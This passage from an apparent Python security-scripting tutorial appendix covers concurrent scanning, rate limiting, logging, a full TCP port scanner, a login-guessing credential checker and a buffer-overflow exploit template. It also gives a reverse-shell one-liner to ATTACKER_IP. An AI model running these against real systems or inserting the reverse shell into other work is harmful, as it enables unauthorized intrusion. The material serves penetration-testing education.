            executor.submit(scan_target, target): target
            for target in targets
        }

        for future in as_completed(future_to_target):
            target = future_to_target[future]
            try:
                result = future.result(timeout=10)
                with lock:
                    results.append(result)
            except Exception as e:
                print(f"[!] {target}: {e}")

    return results

Async Pattern (for high-volume I/O)

import asyncio
import aiohttp

async def async_check_url(session, url):
    """Check a single URL asynchronously."""
    try:
        async with session.get(url, timeout=aiohttp.ClientTimeout(total=5),
                               ssl=False) as resp:
            return {
                "url": url,
                "status": resp.status,
                "size": len(await resp.text())
            }
    except Exception as e:
        return {"url": url, "error": str(e)}

async def async_url_checker(urls, concurrency=50):
    """Check multiple URLs concurrently."""
    semaphore = asyncio.Semaphore(concurrency)
    results = []

    async def bounded_check(session, url):
        async with semaphore:
            return await async_check_url(session, url)

    async with aiohttp.ClientSession() as session:
        tasks = [bounded_check(session, url) for url in urls]
        results = await asyncio.gather(*tasks)

    return results

# Usage
# urls = ["http://target.com/page1", "http://target.com/page2", ...]
# results = asyncio.run(async_url_checker(urls))

Rate-Limited Scanner

import threading
import time

class RateLimiter:
    """Token bucket rate limiter."""
    def __init__(self, rate_per_second):
        self.rate = rate_per_second
        self.tokens = rate_per_second
        self.lock = threading.Lock()
        self.last_time = time.time()

    def acquire(self):
        with self.lock:
            now = time.time()
            elapsed = now - self.last_time
            self.tokens = min(self.rate, self.tokens + elapsed * self.rate)
            self.last_time = now
            if self.tokens >= 1:
                self.tokens -= 1
                return True
            return False

    def wait(self):
        while not self.acquire():
            time.sleep(0.01)

# Usage with scanning
limiter = RateLimiter(100)  # 100 requests/second

def rate_limited_scan(target):
    limiter.wait()
    # ... perform scan ...

14. Error Handling Patterns

Robust Network Error Handling

import socket
import requests
import time
import functools

def retry(max_attempts=3, delay=1, backoff=2, exceptions=(Exception,)):
    """Decorator for retrying functions with exponential backoff."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            attempts = 0
            current_delay = delay
            while attempts < max_attempts:
                try:
                    return func(*args, **kwargs)
                except exceptions as e:
                    attempts += 1
                    if attempts == max_attempts:
                        raise
                    print(f"[*] Retry {attempts}/{max_attempts} "
                          f"after {current_delay}s: {e}")
                    time.sleep(current_delay)
                    current_delay *= backoff
        return wrapper
    return decorator

@retry(max_attempts=3, delay=1,
       exceptions=(requests.ConnectionError, requests.Timeout))
def resilient_request(url):
    """HTTP request with automatic retry."""
    return requests.get(url, timeout=5)

# Comprehensive network error handling
def safe_connect(target, port, timeout=3):
    """Connect with comprehensive error handling."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((target, port))
        return sock
    except socket.timeout:
        print(f"[-] {target}:{port} — Connection timed out")
    except ConnectionRefusedError:
        print(f"[-] {target}:{port} — Connection refused")
    except socket.gaierror:
        print(f"[-] {target} — DNS resolution failed")
    except PermissionError:
        print(f"[-] {target}:{port} — Permission denied (firewall?)")
    except OSError as e:
        print(f"[-] {target}:{port} — OS error: {e}")
    return None

15. Output Formatting and Logging

Colored Terminal Output

from colorama import Fore, Style, init

init(autoreset=True)  # Auto-reset colors after each print

def print_success(msg):
    print(f"{Fore.GREEN}[+]{Style.RESET_ALL} {msg}")

def print_error(msg):
    print(f"{Fore.RED}[-]{Style.RESET_ALL} {msg}")

def print_info(msg):
    print(f"{Fore.BLUE}[*]{Style.RESET_ALL} {msg}")

def print_warning(msg):
    print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} {msg}")

def print_banner(tool_name, version="1.0"):
    banner = f"""
{Fore.CYAN}{'='*50}
  {tool_name} v{version}
  {'='*50}{Style.RESET_ALL}
"""
    print(banner)

Structured Logging

import logging
from datetime import datetime

def setup_logger(name, log_file=None, level=logging.INFO):
    """Configure logging for security tools."""
    logger = logging.getLogger(name)
    logger.setLevel(level)

    formatter = logging.Formatter(
        "%(asctime)s | %(levelname)-8s | %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S"
    )

    # Console handler
    console = logging.StreamHandler()
    console.setFormatter(formatter)
    logger.addHandler(console)

    # File handler (optional)
    if log_file:
        file_handler = logging.FileHandler(log_file)
        file_handler.setFormatter(formatter)
        logger.addHandler(file_handler)

    return logger

# Usage
log = setup_logger("scanner", "scan_results.log")
log.info("Starting scan against 192.168.1.0/24")
log.warning("Port 445 (SMB) is open — check for EternalBlue")
log.error("Connection to 192.168.1.50 failed")

Table Output

from tabulate import tabulate

def display_results(results):
    """Display scan results as a formatted table."""
    headers = ["Host", "Port", "State", "Service", "Version"]
    rows = [
        [r["host"], r["port"], r["state"], r["service"], r["version"]]
        for r in results
    ]
    print(tabulate(rows, headers=headers, tablefmt="grid"))

# Example output:
# +---------------+------+-------+----------+-----------+
# | Host          | Port | State | Service  | Version   |
# +===============+======+=======+==========+===========+
# | 192.168.1.10  | 22   | open  | ssh      | OpenSSH 8 |
# | 192.168.1.10  | 80   | open  | http     | Apache 2  |
# | 192.168.1.10  | 443  | open  | https    | nginx 1.2 |
# +---------------+------+-------+----------+-----------+

16. Common Security Script Patterns

Complete Tool Template

#!/usr/bin/env python3
"""
PortHunter — Fast TCP Port Scanner
Author: Security Student
Usage: python3 porthunter.py -t TARGET -p PORTS [options]
"""

import argparse
import socket
import sys
import time
import threading
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime

try:
    from colorama import Fore, Style, init
    init(autoreset=True)
    HAS_COLOR = True
except ImportError:
    HAS_COLOR = False

# --- Configuration ---
VERSION = "1.0.0"
DEFAULT_TIMEOUT = 1.0
DEFAULT_THREADS = 100

# --- Helper Functions ---
def color(text, color_code):
    if HAS_COLOR:
        return f"{color_code}{text}{Style.RESET_ALL}"
    return text

def banner():
    print(color(f"\n  PortHunter v{VERSION}", Fore.CYAN))
    print(color(f"  {'─' * 30}\n", Fore.CYAN))

def parse_ports(spec):
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            start, end = map(int, part.split("-"))
            ports.update(range(start, end + 1))
        else:
            ports.add(int(part))
    return sorted(ports)

# --- Core Logic ---
def scan_port(target, port, timeout):
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((target, port)) == 0:
                try:
                    s.send(b"\r\n")
                    banner_text = s.recv(1024).decode(errors="replace").strip()
                except:
                    banner_text = ""
                return {"port": port, "state": "open", "banner": banner_text}
    except:
        pass
    return None

def main():
    parser = argparse.ArgumentParser(description="Fast TCP Port Scanner")
    parser.add_argument("-t", "--target", required=True, help="Target host")
    parser.add_argument("-p", "--ports", default="1-1024", help="Port spec")
    parser.add_argument("--threads", type=int, default=DEFAULT_THREADS)
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    parser.add_argument("-o", "--output", help="Output JSON file")
    parser.add_argument("-q", "--quiet", action="store_true")
    args = parser.parse_args()

    if not args.quiet:
        banner()

    target = args.target
    ports = parse_ports(args.ports)

    # Resolve hostname
    try:
        target_ip = socket.gethostbyname(target)
    except socket.gaierror:
        print(color(f"[-] Cannot resolve: {target}", Fore.RED))
        sys.exit(1)

    print(f"[*] Scanning {target} ({target_ip}) — {len(ports)} ports")
    start_time = time.time()

    results = []
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = {
            executor.submit(scan_port, target_ip, port, args.timeout): port
            for port in ports
        }
        for future in as_completed(futures):
            result = future.result()
            if result:
                results.append(result)
                port = result["port"]
                banner_text = result["banner"][:60] if result["banner"] else ""
                print(color(f"  [+] {port:>5}/tcp  open  {banner_text}", Fore.GREEN))

    elapsed = time.time() - start_time
    results.sort(key=lambda x: x["port"])

    print(f"\n[*] Scan complete: {len(results)} open ports "
          f"found in {elapsed:.2f}s")

    if args.output:
        output_data = {
            "target": target,
            "ip": target_ip,
            "scan_date": datetime.now().isoformat(),
            "ports_scanned": len(ports),
            "results": results,
            "elapsed_seconds": round(elapsed, 2)
        }
        with open(args.output, "w") as f:
            json.dump(output_data, f, indent=2)
        print(f"[*] Results saved to {args.output}")

if __name__ == "__main__":
    main()

Credential Checker Pattern

def credential_checker(target, service, cred_list):
    """Generic credential checking pattern."""
    for username, password in cred_list:
        try:
            if service == "ssh":
                success = try_ssh(target, username, password)
            elif service == "ftp":
                success = try_ftp(target, username, password)
            elif service == "http":
                success = try_http_login(target, username, password)

            if success:
                return (username, password)

        except Exception:
            continue

    return None

Exploit Development Pattern

import struct
import socket

def build_exploit(target_ip, target_port, shellcode):
    """Generic buffer overflow exploit template."""

    # Build the payload
    offset = 1024         # Offset to EIP (found via fuzzing)
    eip = struct.pack("<I", 0x625011AF)  # JMP ESP address
    nop_sled = b"\x90" * 16

    payload = b"A" * offset
    payload += eip
    payload += nop_sled
    payload += shellcode

    # Send the exploit
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        sock.send(payload)
        sock.close()
        print("[+] Exploit sent!")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

Quick Reference: Common One-Liners

# Reverse shell (netcat-style) — for authorized testing only
import os; os.system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1")

# Quick HTTP server for file transfer
# python3 -m http.server 8080

# Base64 encode/decode
import base64
encoded = base64.b64encode(b"payload data").decode()
decoded = base64.b64decode(encoded)

# URL encode/decode
from urllib.parse import quote, unquote
encoded = quote("param=value&foo=bar <script>")
decoded = unquote(encoded)

# Generate random strings (for tokens, filenames)
import secrets
token = secrets.token_hex(16)       # 32-char hex string
url_token = secrets.token_urlsafe(16)  # URL-safe string

# IP address manipulation
import ipaddress
network = ipaddress.ip_network("192.168.1.0/24")
hosts = list(network.hosts())  # All usable host IPs

# Timestamp conversion
from datetime import datetime
ts = datetime.fromtimestamp(1700000000)  # Unix -> datetime
unix_ts = int(datetime.now().timestamp())  # datetime -> Unix

All code in this appendix is provided for educational purposes in authorized penetration testing and security research only. Always ensure you have proper written authorization before testing any system you do not own.